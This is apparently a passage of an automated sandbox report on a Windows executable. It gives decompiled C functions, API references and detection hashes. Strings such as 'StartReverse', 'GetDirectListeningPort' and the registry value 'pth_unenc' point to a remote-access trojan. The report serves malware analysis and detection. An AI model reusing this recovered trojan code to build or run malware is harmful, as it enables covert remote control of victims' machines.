										goto L13;
									} else {
										 *0x460a95 = 1;
										E004020E6(_t53, _t107 - 0x18, "GetDirectListeningPort", __eflags, E004031A1( &_v88, "GetDirectListeningPort", __eflags, 0));
										_push(0x76);
										goto L5;
									}
								}
							}
						}
					}
				} else {
					_t99 = _t95 - 1;
					if(_t99 == 0) {
						_t51 =  *0x460cc8(E00432099(_t48, E00401F2E(E004031A1( &_v88, _t84, __eflags, 0))));
						_t111 = _t107 - 0x14;
						goto L4;
					} else {
						_t115 = _t99 == 0;
						if(_t99 == 0) {
							_t51 =  *0x460ccc();
							_t111 = _t107 - 0x18;
							L4:
							_t84 = _t51;
							E0041107C(_t53, _t111, _t51);
							_push(0x77);
							L5:
							E00401790(_t53, _t91, _t84, _t115);
						}
					}
				}
				E004031CC( &_v108);
				E00401F97();
				E00401F97();
				return 0;
			}






























                                            0x0040b586
                                            0x0040b586
                                            0x0040b593
                                            0x0040b596
                                            0x0040b59d
                                            0x0040b5a5
                                            0x0040b5af
                                            0x0040b5c3
                                            0x0040b5c8
                                            0x0040b5d2
                                            0x0040b5d7
                                            0x0040b5e1
                                            0x0040b5ea
                                            0x0040b5ef
                                            0x0040b5f2
                                            0x0040b5f5
                                            0x0040b65d
                                            0x0040b664
                                            0x0040b666
                                            0x0040b668
                                            0x0040b702
                                            0x0040b704
                                            0x00000000
                                            0x0040b66e
                                            0x0040b67a
                                            0x0040b683
                                            0x0040b693
                                            0x0040b69a
                                            0x0040b69f
                                            0x0040b6a4
                                            0x0040b6a9
                                            0x0040b6ab
                                            0x0040b6b0
                                            0x0040b6b5
                                            0x0040b6b7
                                            0x0040b6f3
                                            0x0040b6f6
                                            0x0040b6f8
                                            0x0040b709
                                            0x0040b725
                                            0x0040b72b
                                            0x0040b732
                                            0x0040b73b
                                            0x0040b6b9
                                            0x0040b6b9
                                            0x0040b6c0
                                            0x00000000
                                            0x0040b6c2
                                            0x0040b6c2
                                            0x0040b6c9
                                            0x00000000
                                            0x0040b6cb
                                            0x0040b6cb
                                            0x0040b6cd
                                            0x00000000
                                            0x0040b6cf
                                            0x0040b6d5
                                            0x0040b6e7
                                            0x0040b6ec
                                            0x00000000
                                            0x0040b6ec
                                            0x0040b6cd
                                            0x0040b6c9
                                            0x0040b6c0
                                            0x0040b6b7
                                            0x0040b5f7
                                            0x0040b5f7
                                            0x0040b5fa
                                            0x0040b640
                                            0x0040b646
                                            0x00000000
                                            0x0040b5fc
                                            0x0040b5fd
                                            0x0040b600
                                            0x0040b606
                                            0x0040b60c
                                            0x0040b60f
                                            0x0040b60f
                                            0x0040b613
                                            0x0040b618
                                            0x0040b61a
                                            0x0040b61c
                                            0x0040b61c
                                            0x0040b600
                                            0x0040b5fa
                                            0x0040b744
                                            0x0040b74d
                                            0x0040b756
                                            0x0040b763

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Event
                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward
                                            • API String ID: 4201588131-610893799
                                            • Opcode ID: b1c4e90372f4b3c8b3b5bb54e02fe8ca03431f59a04a0e65c5c9295ec610ffca
                                            • Instruction ID: 261bfdf7047094062386ff5bcea2c780d9a3efdcfd0066bd4674e9f9878c2db2
                                            • Opcode Fuzzy Hash: b1c4e90372f4b3c8b3b5bb54e02fe8ca03431f59a04a0e65c5c9295ec610ffca
                                            • Instruction Fuzzy Hash: 1941C271A143015BC604BB76D856A6F3A95AB80308F404A3FF502A72E2EF7D9909C7CF
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043447C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E0043447C(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0043CAC9(_t52);
					GetModuleFileNameA(0, 0x4603b8, 0x104);
					_t49 =  *0x460960; // 0x473540
					 *0x460968 = 0x4603b8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x4603b8;
					}
					_v8 = 0;
					_v16 = 0;
					E004345A0(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00434715(_v8, _v16, 1);
					if(_t64 != 0) {
						E004345A0(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0043C5E4(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x460954 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x460958 = _t59;
									L16:
									E00437795(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x460954 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x460958 = _t43;
						goto L10;
					} else {
						_t44 = E00432914();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00437795(_t64);
						return _t50;
					}
				} else {
					_t45 = E00432914();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00430C7A();
					return _t65;
				}
			}





















                                            0x0043447c
                                            0x00434489
                                            0x004344a9
                                            0x004344bc
                                            0x004344c2
                                            0x004344c8
                                            0x004344d0
                                            0x004344d7
                                            0x004344d7
                                            0x004344dc
                                            0x004344e3
                                            0x004344ea
                                            0x004344fc
                                            0x00434503
                                            0x00434522
                                            0x0043452e
                                            0x00434549
                                            0x0043454c
                                            0x00434553
                                            0x00434559
                                            0x00434560
                                            0x00434563
                                            0x00434565
                                            0x00434569
                                            0x00434573
                                            0x00434573
                                            0x00434575
                                            0x0043457b
                                            0x0043457e
                                            0x00434580
                                            0x00434586
                                            0x00434587
                                            0x0043458d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043456b
                                            0x0043456b
                                            0x0043456b
                                            0x0043456e
                                            0x0043456f
                                            0x00000000
                                            0x0043456b
                                            0x0043455b
                                            0x00000000
                                            0x0043455b
                                            0x00434534
                                            0x00434539
                                            0x0043453b
                                            0x0043453d
                                            0x00000000
                                            0x00434505
                                            0x00434505
                                            0x0043450a
                                            0x0043450c
                                            0x0043450d
                                            0x00434542
                                            0x00434542
                                            0x00434590
                                            0x00434591
                                            0x00000000
                                            0x0043459a
                                            0x00434491
                                            0x00434491
                                            0x00434498
                                            0x00434499
                                            0x0043449b
                                            0x00000000
                                            0x004344a0

                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\V8IB839cvz.exe,00000104), ref: 004344BC
                                            • _free.LIBCMT ref: 00434587
                                            • _free.LIBCMT ref: 00434591
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free$FileModuleName
                                            • String ID: @5G$C:\Users\user\Desktop\V8IB839cvz.exe
                                            • API String ID: 2506810119-512209482
                                            • Opcode ID: 023dc19d8f2e751c44ec9740aa6e2024819c8a8f4a7c9a52efd9fd1f0fc3aa76
                                            • Instruction ID: 04f9939b2a19043a26a669250eb0eb9a4d65288824fabd6e8276f8b2b8c8c6aa
                                            • Opcode Fuzzy Hash: 023dc19d8f2e751c44ec9740aa6e2024819c8a8f4a7c9a52efd9fd1f0fc3aa76
                                            • Instruction Fuzzy Hash: E131A2B1E01218BBDB21DF9698809DFBBA8EBCD714F10506BE50497311E7B8AE41CB59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004125AA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 70%
                                            			E004125AA() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				void* __edi;
				struct HWND__* _t20;
				void* _t23;

				E0042B710(_t23,  &(_v68.style), 0, 0x2c);
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = E0041262A;
				_v68.cbClsExtra = 0;
				asm("movsd");
				_v68.lpszClassName =  &_v20;
				_v68.cbWndExtra = 0;
				asm("movsd");
				_v68.lpszMenuName = 0;
				asm("movsd");
				asm("movsw");
				asm("movsb");
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t20 == 0) {
					GetLastError();
					goto L3;
				}
				return _t20;
			}








                                            0x004125bc
                                            0x004125c6
                                            0x004125d0
                                            0x004125d6
                                            0x004125e0
                                            0x004125e3
                                            0x004125e4
                                            0x004125eb
                                            0x004125ee
                                            0x004125ef
                                            0x004125f2
                                            0x004125f3
                                            0x004125f5
                                            0x004125ff
                                            0x00412621
                                            0x00000000
                                            0x00412621
                                            0x00412611
                                            0x00412619
                                            0x0041261b
                                            0x00000000
                                            0x0041261b
                                            0x00412629

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ClassCreateErrorLastRegisterWindow
                                            • String ID: 0$MsgWindowClass
                                            • API String ID: 2877667751-2410386613
                                            • Opcode ID: 4c06ce600fe9f3e39008c57c5c4278744305d7098ea36e9becf5411030f272d9
                                            • Instruction ID: 12d18aab92a9cc9480085aada6ffb618e767649d132bfaefb8c6e98bf0a05d1a
                                            • Opcode Fuzzy Hash: 4c06ce600fe9f3e39008c57c5c4278744305d7098ea36e9becf5411030f272d9
                                            • Instruction Fuzzy Hash: 510125B5D0021DAFDB01DFD5AC849EFBBBCFB49354F40052AF800A2280E7B54A048BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004116B9, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E004116B9(WCHAR* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				struct _OVERLAPPED* _t13;
				struct _OVERLAPPED* _t15;
				void* _t22;
				long _t25;

				_push(__ecx);
				_push(__ecx);
				_t15 = 0;
				_v8 = __edx;
				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t25 = GetFileSize(_t22, 0);
					E00405796(0, _v8, _t22, _t25, 0);
					_t4 =  &_v12; // 0x40e149
					_v12 = 0;
					if(ReadFile(_t22, E00401F2E(_v8), _t25, _t4, 0) != 0) {
						_t15 = 1;
					}
					CloseHandle(_t22);
					_t13 = _t15;
				} else {
					_t13 = 0;
				}
				return _t13;
			}











                                            0x004116bc
                                            0x004116bd
                                            0x004116c0
                                            0x004116c2
                                            0x004116dc
                                            0x004116e1
                                            0x004116f3
                                            0x004116f7
                                            0x004116ff
                                            0x00411705
                                            0x00411718
                                            0x0041171a
                                            0x0041171a
                                            0x0041171d
                                            0x00411723
                                            0x004116e3
                                            0x004116e3
                                            0x004116e3
                                            0x0041172a

                                            APIs
                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,0046103C,00000000,00000000,00000000,?,0040E149), ref: 004116D6
                                            • GetFileSize.KERNEL32(00000000,00000000,00000000,?,0040E149), ref: 004116EA
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,I@,00000000,00000000,00000000,?,0040E149), ref: 0041170F
                                            • CloseHandle.KERNEL32(00000000,0040E149), ref: 0041171D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleReadSize
                                            • String ID: I@
                                            • API String ID: 3919263394-4100502531
                                            • Opcode ID: 8696ae176fa85b2664898ac1d692efb979985cba8a68c54f101f34649112e5dd
                                            • Instruction ID: 594b9d03f96b01024d456e647c4aea021a10d57e771c0e2476f4e90f7bd177e7
                                            • Opcode Fuzzy Hash: 8696ae176fa85b2664898ac1d692efb979985cba8a68c54f101f34649112e5dd
                                            • Instruction Fuzzy Hash: CA01A978601109BFE7105B619CC5EFF776CEB46764F10026AF901A3290DA755E41A674
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401E87, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44synchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00401E87(void* __ecx) {
				void* __ebx;
				long _t19;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				intOrPtr _t37;

				_t29 = __ecx;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
					L3:
					 *((char*)(_t29 + 0x50)) = 0;
					_t37 =  *0x460a94; // 0x0
					if(_t37 != 0) {
						_t31 = _t30 - 0x18;
						E0040207E(0, _t30 - 0x18, "Connection timeout");
						E0040207E(0, _t31 - 0x18, "[WARNING]");
						E00410B51(0);
					}
					E00401AF7(_t29);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t29 + 0x54), 0x3e8);
					 *((intOrPtr*)(_t29 + 0x60)) =  *((intOrPtr*)(_t29 + 0x60)) + 1;
					_t28 =  *((intOrPtr*)(_t29 + 0x60));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t29 + 0x5c))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t29 + 0x54));
				 *(_t29 + 0x54) = 0;
				 *((char*)(_t29 + 0x50)) = 0;
				SetEvent( *(_t29 + 0x58));
				return 0;
			}









                                            0x00401e89
                                            0x00401e8d
                                            0x00401e93
                                            0x00401eb2
                                            0x00401eb2
                                            0x00401eb5
                                            0x00401ebb
                                            0x00401ebd
                                            0x00401ec7
                                            0x00401ed6
                                            0x00401edb
                                            0x00401ee0
                                            0x00401ee5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00401e95
                                            0x00401e95
                                            0x00401e9d
                                            0x00401ea3
                                            0x00401ea6
                                            0x00401eab
                                            0x00000000
                                            0x00000000
                                            0x00401eb0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00401eb0
                                            0x00401ef3
                                            0x00401efc
                                            0x00401eff
                                            0x00401f02
                                            0x00000000

                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00401E82), ref: 00401E9D
                                            • CloseHandle.KERNEL32(?), ref: 00401EF3
                                            • SetEvent.KERNEL32(?), ref: 00401F02
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandleObjectSingleWait
                                            • String ID: Connection timeout$[WARNING]
                                            • API String ID: 2055531096-1470507543
                                            • Opcode ID: 3eb474262a81101e73888c32f535310af99d3fb9cb2f1a75b48e8b6fb2af75af
                                            • Instruction ID: 2e6574174d18b5c680ea77f821f6a44265434eb1f04b31fb28015b4e5f2a7229
                                            • Opcode Fuzzy Hash: 3eb474262a81101e73888c32f535310af99d3fb9cb2f1a75b48e8b6fb2af75af
                                            • Instruction Fuzzy Hash: 8D018831641740ABD7216BB5C95641F7B91BF02309740097EE88356AA1DBF89844D79A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004087FA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E004087FA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _t34;
				signed int* _t49;
				signed int* _t57;
				void* _t65;
				signed int* _t66;

				_t65 = __ecx;
				E004297F8(__ecx, 0);
				E00409BA6(__ecx + 4);
				E00409BA6(__ecx + 0xc);
				E00409B90(__ecx + 0x14);
				E00409B90(__ecx + 0x1c);
				E00409BA6(__ecx + 0x24);
				E00409BA6(__ecx + 0x2c);
				_t76 = _a4;
				if(_a4 == 0) {
					_t49 =  &_v16;
					E0040879F(_t49, "bad locale name");
					E0042B694( &_v16, 0x45d9b8);
					asm("int3");
					_push(_t65);
					_t66 = _t49;
					E00429B8B(_t66);
					E00409B8B( &(_t66[0xb]));
					E00409B8B( &(_t66[9]));
					E00409B8B( &(_t66[7]));
					E00409B8B( &(_t66[5]));
					E00409B8B( &(_t66[3]));
					E00409B8B( &(_t66[1]));
					_t57 = _t66;
					_t34 =  *_t57;
					__eflags = _t34;
					if(_t34 == 0) {
						return E004366CC(4);
					} else {
						__eflags = _t34 - 8;
						if(_t34 < 8) {
							_t37 = 0x460040 + _t34 * 0x18;
							__eflags = 0x460040 + _t34 * 0x18;
							return E0042A09D(0x460040 + _t34 * 0x18, _t37);
						}
						return _t34;
					}
				} else {
					E00429B40(__ebx, __edx, __edi, _t76, __ecx, _a4);
					return _t65;
				}
			}









                                            0x00408803
                                            0x00408805
                                            0x0040880d
                                            0x00408815
                                            0x0040881d
                                            0x00408825
                                            0x0040882d
                                            0x00408835
                                            0x0040883a
                                            0x0040883e
                                            0x00408859
                                            0x0040885c
                                            0x0040886a
                                            0x0040886f
                                            0x00408870
                                            0x00408871
                                            0x00408874
                                            0x0040887d
                                            0x00408885
                                            0x0040888d
                                            0x00408895
                                            0x0040889d
                                            0x004088a5
                                            0x004088aa
                                            0x00429850
                                            0x00429852
                                            0x00429854
                                            0x004366f4
                                            0x0042985a
                                            0x0042985a
                                            0x0042985d
                                            0x00429862
                                            0x00429862
                                            0x00000000
                                            0x0042986d
                                            0x0042986e
                                            0x0042986e
                                            0x00408840
                                            0x00408844
                                            0x00408851
                                            0x00408851

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00408805
                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00408844
                                              • Part of subcall function 00429B40: _Yarn.LIBCPMT ref: 00429B5F
                                              • Part of subcall function 00429B40: _Yarn.LIBCPMT ref: 00429B83
                                            • std::bad_exception::bad_exception.LIBCMT ref: 0040885C
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040886A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                            • String ID: bad locale name
                                            • API String ID: 3706160523-1405518554
                                            • Opcode ID: a3c64c523580a7dc57283692886e89af9c32f16cf74eb85ac2955a44f6c92bd3
                                            • Instruction ID: bfda7b02c910a943723198f4693e42617b8dc83538c742242534c3d12bdd32ff
                                            • Opcode Fuzzy Hash: a3c64c523580a7dc57283692886e89af9c32f16cf74eb85ac2955a44f6c92bd3
                                            • Instruction Fuzzy Hash: 14F06D325006049AC324FB62F892D9A73B4AF10324F50457FB546224D3AF39B909C688
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040B9BC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E0040B9BC(void* __ecx, short* __edx, char _a8) {
				void* _v8;
				signed int _t15;
				long _t18;
				signed int _t20;
				signed int _t21;

				_push(__ecx);
				_push(_t20);
				if(RegCreateKeyW(0x80000001, __edx,  &_v8) != 0) {
					_t21 = 0;
				} else {
					_t15 = E00401F26();
					_t18 = RegSetValueExW(_v8, L"pth_unenc", 0, 1, L00404090( &_a8), 2 + _t15 * 2);
					RegCloseKey(_v8);
					_t21 = _t20 & 0xffffff00 | _t18 == 0x00000000;
				}
				E004031D1();
				return _t21;
			}








                                            0x0040b9bf
                                            0x0040b9c0
                                            0x0040b9d3
                                            0x0040ba14
                                            0x0040b9d5
                                            0x0040b9d9
                                            0x0040b9fb
                                            0x0040ba06
                                            0x0040ba0f
                                            0x0040ba0f
                                            0x0040ba19
                                            0x0040ba24

                                            APIs
                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0040B9CB
                                            • RegSetValueExW.ADVAPI32(?,pth_unenc,00000000,00000001,00000000,00000000,00461210,?,?,004098AB,?,C:\Users\user\Desktop\V8IB839cvz.exe), ref: 0040B9FB
                                            • RegCloseKey.ADVAPI32(?,?,?,004098AB,?,C:\Users\user\Desktop\V8IB839cvz.exe), ref: 0040BA06
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCreateValue
                                            • String ID: 3.1.4 Light$pth_unenc
                                            • API String ID: 1818849710-4035209649
                                            • Opcode ID: b4b55225bf574746a87a85400620b74c104fdce1c1c904a80259882e763f0d84
                                            • Instruction ID: a1eed24e16dfe1bd400cfb4ae0967155a1fd9bf2e26d701bc9aea491f8e1ecfe
                                            • Opcode Fuzzy Hash: b4b55225bf574746a87a85400620b74c104fdce1c1c904a80259882e763f0d84
                                            • Instruction Fuzzy Hash: 71F0CD31640108BBDB009FA0EC46FEB332CEB41714F10416ABD05BA191EB355E04DA98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00434381, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00434376,00000003,?,00434316,00000003,0045D5A0,0000000C,00434429,00000003,00000002), ref: 004343A1
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004343B4
                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00434376,00000003,?,00434316,00000003,0045D5A0,0000000C,00434429,00000003,00000002,00000000), ref: 004343D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 7df908d46381f93ec429445ab24fa00a26c03cd328cdba41f9d85e1301d15396
                                            • Instruction ID: 8cd4d4d1c1e63d81bf341b93f332a3772ac5c15dc44bb7d2ac30dfa50c51df87
                                            • Opcode Fuzzy Hash: 7df908d46381f93ec429445ab24fa00a26c03cd328cdba41f9d85e1301d15396
                                            • Instruction Fuzzy Hash: 79F04434A00218BBDB119F50DC09BEE7FB5EF49715F100179FC05A22A0CB749D50DA58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00440A27, Relevance: 7.7, APIs: 5, Instructions: 222COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00440A27(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t116;
				signed int _t117;

				_t106 = __edx;
				_t59 =  *0x45f014; // 0x8d941b67
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t91 = _a12;
				_t116 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						E0042F367(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
								if(_t64 == 0 || _v20 != _t116) {
									L55:
									_t65 = E00432914();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t116;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t116 = _t116 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t116 || GetLastError() != 0x7a) {
										L45:
										_t71 = E00432914();
										_t116 = _t116 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t103 =  *(_t109 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t116;
											_v32 = _t76;
